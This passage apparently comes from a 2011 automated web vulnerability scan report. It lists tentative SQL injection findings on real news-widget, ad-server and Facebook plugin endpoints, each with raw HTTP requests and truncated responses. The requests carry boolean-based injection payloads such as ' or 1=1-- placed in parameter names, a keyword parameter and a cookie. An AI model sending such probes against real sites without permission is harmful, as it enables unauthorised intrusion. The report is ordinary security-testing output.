</body></html>

Request 2

GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d2--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 500
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:47:33 GMT
Connection: close
Content-Length: 75451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<script type="text/javascript">
if (((document.domain.indexOf("smh.com.au") != -1) || (document.domain.indexOf("theage.com.au") != -1) ||
(document.domain.indexOf("watoday.com.au") != -1) ||
(document.domain.indexOf("brisbanetimes.com.au") != -1) ||
(document.domain.indexOf("businessday.com.au") != -1)) && (isSmartPhone()) &&
(document.cookie.indexOf("iphone_redirect=false") == -1)) {
var currentLocation = document.location.href;
if (currentLocation.indexOf("www.") != -1) {
currentLocation = currentLocation.replace("www.", "m.");
window.location = currentLocation;
}
}

/**
* Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone.
*
* @return True if the user agent represents a smart phone; otherwise false.
*/
function isSmartPhone() {
var userAgent = navigator.userAgent
return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) &&
(!matchesTabletUserAgentRegularExpressions(userAgent)));
}

/**
* Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone.
* If any of the regular expressions are updated then they should be updated in
* <code>SmartPhoneHelper.java</code>.

...[SNIP]...

1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 99435588%20or%201%3d1--%20 and 99435588%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d1--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:23 GMT
Connection: close
Content-Length: 234

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d2--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 11:51:26 GMT
ETag: "17c809e-17efa-a4adab80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Date: Mon, 02 May 2011 12:46:24 GMT
Connection: close
Content-Length: 98042

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;}
ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;}
ul.tabs li {
...[SNIP]...

1.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [keyword parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The keyword parameter appears to be vulnerable to SQL injection attacks. The payloads 18878509'%20or%201%3d1--%20 and 18878509'%20or%201%3d2--%20 were each submitted in the keyword parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a/7856/12590/22893-15.js?cb=0.5460146523546427&rf=http%3A//www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html&keyword=bt/news_home18878509'%20or%201%3d1--%20 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; ruid=154dab7990adc1d6f3372c12^4^1304340334^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=12590^1; csi15=3151650.js^1^1304340335^1304340335; rdk=7725/12338; rdk2=0; ses2=12338^2; csi2=3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:48:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 02-May-2011 13:48:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 02-May-2011 13:48:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12590^2; expires=Tue, 03-May-2011 04:59:59 GMT; max-age=69117; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151650.js^2^1304340335^1304340482; expires=Mon, 09-May-2011 12:48:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2350

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151650"
...[SNIP]...
<script type=\"text/javascript\">\n rsi_pub = \'0CE15E9CF251ABFED1E2BCB12FE46271\';\n rsi_site = \'1113C261FAADC37B3C324A49EE1DF4E5\';\n rsi_width = \'300\';\n rsi_height = \'250\';\n<\/script>\n<script type=\"text/javascript\" src=\"http://ads.revsci.net/adserver/rsiads.js\"><\/script>\n<!-- unique_id: 814544, size_id: 300x250 -->"; rubicon_tag_code = rubicon_tag_code.replace(/##RUBICON_CB##/g,rubicon_cb); document.write(rubicon_tag_code); document.write("<script type=\"text/javascript\">oz_sensor_filter=\"domain\";<\/script><script type=\"text/javascript\" defer=\"defer\" src=\"http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js\"><\/script><img src=\"http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"Quantcast\"/><script defer=\"defer\" type=\"text/javascript\">\n{\n    if (Math.floor(Math.random()*100) < 1)\n    {\n        var url;\n        var iframe = (window != top);\n        url = \"http://tap.rubiconproject.com/stats/iframes?pc=7856/12590&ptc=22893&upn=\"+iframe;\n        setTimeout(function(){ new Image().src = url }, 1000);\n    }\n}\n<\/script>\n<script>var _comscore = _comscore || []; _comscore.push({ c1: \"8\", c2: \"6135404\", c3: \"15\", c4: \"12590\", c10: \"3151998\" }); (function() { var s = document.createElement(\"script\"), el = document.getElementsByTagName(\"script\")[0]; s.async = true; s.src = (document.location.protocol == \"https:\" ? 
\"https://sb\" : \"http://b\") + \".scorecardresearch.com/beacon.js\"; el.parentNode.insertBefore(s, el); })();<\/script><img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/><DIV STYLE=\"height:0px; width:0px; overflow:hidden\"><IFRAME SRC=\"http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html\" FRAMEBORDER=\"0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" SCROLLING=\"NO\" WIDTH=\"0\" HEIGHT=\"0\" style=\"height:0px;
...[SNIP]...

Request 2

GET /a/7856/12590/22893-15.js?cb=0.5460146523546427&rf=http%3A//www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html&keyword=bt/news_home18878509'%20or%201%3d2--%20 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; ruid=154dab7990adc1d6f3372c12^4^1304340334^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=12590^1; csi15=3151650.js^1^1304340335^1304340335; rdk=7725/12338; rdk2=0; ses2=12338^2; csi2=3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:48:00 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 02-May-2011 13:48:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 02-May-2011 13:48:00 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12590^2; expires=Tue, 03-May-2011 04:59:59 GMT; max-age=69119; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151966.js^1^1304340480^1304340480&3151650.js^1^1304340335^1304340335; expires=Mon, 09-May-2011 12:48:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2850

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151966"
...[SNIP]...
<script type=\"text/javascript\">\nvar AdBrite_Title_Color = \'0000FF\';\nvar AdBrite_Text_Color = \'000000\';\nvar AdBrite_Background_Color = \'FFFFFF\';\nvar AdBrite_Border_Color = \'CCCCCC\';\nvar AdBrite_URL_Color = \'008000\';\ntry{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==\'\'?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe=\'\';var AdBrite_Referrer=\'\';}\n<\/script>\n<script type=\"text/javascript\">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(\' src=\"http://ads.adbrite.com/mb/text_group.php?sid=1545296&zs=3330305f323530&ifr=\'+AdBrite_Iframe+\'&ref=\'+AdBrite_Referrer+\'\" type=\"text/javascript\">\');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));<\/script>"; rubicon_tag_code = rubicon_tag_code.replace(/##RUBICON_CB##/g,rubicon_cb); document.write(rubicon_tag_code); document.write("<script type=\"text/javascript\">oz_sensor_filter=\"domain\";<\/script><script type=\"text/javascript\" defer=\"defer\" src=\"http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js\"><\/script><img src=\"http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"Quantcast\"/><script defer=\"defer\" type=\"text/javascript\">\n{\n    if (Math.floor(Math.random()*100) < 1)\n    {\n        var url;\n        var iframe = (window != top);\n        url = \"http://tap.rubiconproject.com/stats/iframes?pc=7856/12590&ptc=22893&upn=\"+iframe;\n        setTimeout(function(){ new Image().src = url }, 1000);\n    }\n}\n<\/script>\n<script>var _comscore = _comscore || []; _comscore.push({ c1: \"8\", c2: \"6135404\", c3: \"15\", c4: \"12590\", c10: \"3152321\" }); (function() { var s = document.createElement(\"script\"), el = document.getElementsByTagName(\"script\")[0]; s.async = true; s.src = (document.location.protocol 
== \"https:\" ? \"https://sb\" : \"http://b\") + \".scorecardresearc
...[SNIP]...

1.26. http://www.facebook.com/plugins/activity.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14576993'%20or%201%3d1--%20 and 14576993'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/activity.php?site=glam.com&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23CCCCCC HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo214576993'%20or%201%3d1--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.92.93
X-Cnection: close
Date: Mon, 02 May 2011 13:12:16 GMT
Content-Length: 12563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u193663_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; border-color:#cccccc;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="glam.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.glam.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u193663_3"><input value="Sign Up" type="submit" id="u193663_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u193663_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u193663_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_2624b6b0a981374f"><a class="fbImageContainer fbMonitor UIImageBlock_Image
...[SNIP]...

Request 2

GET /plugins/activity.php?site=glam.com&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23CCCCCC HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo214576993'%20or%201%3d2--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.125.83
X-Cnection: close
Date: Mon, 02 May 2011 13:12:17 GMT
Content-Length: 12580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/9Ck4naJeroG.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yg/r/-V2muYq3bAL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u193784_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; border-color:#cccccc;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="glam.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.glam.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u193784_3"><input value="Sign Up" type="submit" id="u193784_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u193784_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u193784_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_3bdcdca4df106b65"><a class="fbImageContainer fbMonitor UIImageBlock_Ima
...[SNIP]...

1.27. http://www.facebook.com/plugins/facepile.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 33325718'%20or%201%3d1--%20 and 33325718'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/facepile.php?api_key=8744a0ccdce1491c4474dacf75dc2d12 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.myspace.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo233325718'%20or%201%3d1--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.36
X-Cnection: close
Date: Mon, 02 May 2011 12:59:20 GMT
Content-Length: 6107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yg/r/-V2muYq3bAL.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/9Ck4naJeroG.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:372758,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"8240e",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
